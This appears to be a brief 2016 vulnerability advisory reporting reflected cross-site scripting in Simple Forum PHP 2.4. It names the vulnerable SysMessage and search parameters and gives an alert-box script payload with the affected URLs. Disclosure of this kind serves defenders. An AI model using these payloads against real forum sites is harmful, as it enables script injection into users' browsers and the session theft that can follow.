===================================================== # Simple Forum PHP 2.4 - Reflected XSS ===================================================== # Vendor Homepage: http://simpleforumphp.com # Date: 14 Oct 2016 # Demo Link : http://simpleforumphp.com/forum/admin.php # Version : 2.4 # Platform : WebApp - PHP # Author: Ashiyane Digital Security Team # Contact: hehsan979@gmail.com ===================================================== # PoC: Vulnerable parameter : SysMessage Mehod : GET Payload : <script>alert('Reflected XSS')</script> Vulnerable Url: http://localhost/forum/preview.php?SysMessage=[payload] Vulnerable parameter : search Mehod : POST Payload : <script>alert('Reflected XSS')</script> Vulnerable Url: http://simpleforumphp.com/forum/admin.php ===================================================== # Discovered By : Ehsan Hosseini =====================================================